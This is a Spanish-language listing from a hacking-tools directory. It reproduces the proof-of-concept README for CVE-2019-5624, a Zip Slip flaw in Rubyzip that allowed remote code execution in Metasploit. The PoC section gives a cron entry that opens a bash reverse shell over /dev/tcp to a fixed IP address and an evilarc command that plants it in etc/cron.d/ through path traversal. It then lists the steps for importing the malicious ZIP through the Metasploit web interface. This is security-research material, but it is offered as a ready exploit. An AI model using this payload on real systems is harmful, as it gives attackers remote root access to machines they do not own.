Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/voidsec/cve-2019-5624
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Una prueba de concepto para la vulnerabilidad CVE-2019-5624 de Metasploit (manejo inseguro de ZIP en Rubyzip que permite ejecución remota de código).

Ver Repositorio
1353hace 7 añosAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-5624

Una prueba de concepto para la vulnerabilidad CVE-2019-5624 de Metasploit (manejo inseguro de ZIP en Rubyzip que deriva en ejecución remota de código, RCE)

Introducción

En febrero de 2019 encontré una nueva vulnerabilidad en la librería Rubyzip. Permite a un atacante explotar el manejo inseguro de archivos ZIP (Zip Slip) que resulta en la ejecución remota de comandos.

Esta vulnerabilidad se utilizó para atacar todas las versiones de Metasploit < 5.0.18 Metasploit Wrap-Up

He escrito una entrada de blog detallada que explica esta vulnerabilidad.

POC

  • Crea un archivo con el siguiente contenido:
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • Genera el archivo ZIP con el payload de path traversal:
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • Añade un workspace válido de MSF al archivo ZIP (para que MSF lo extraiga; de lo contrario, se negará a procesar el archivo ZIP)
  • Configura dos listeners, uno en el puerto 4444 y el otro en el puerto 4445 (el del puerto 4445 recibirá la reverse shell)
  • Inicia sesión en la interfaz web de MSF
  • Crea un nuevo “Project”
  • Selecciona “Import”, “From file”, elige el archivo ZIP malicioso y, por último, haz clic en el botón “Import”
  • Espera a que finalice el proceso de importación
  • Disfruta de tu reverse shell
  • Video

    Descargar herramienta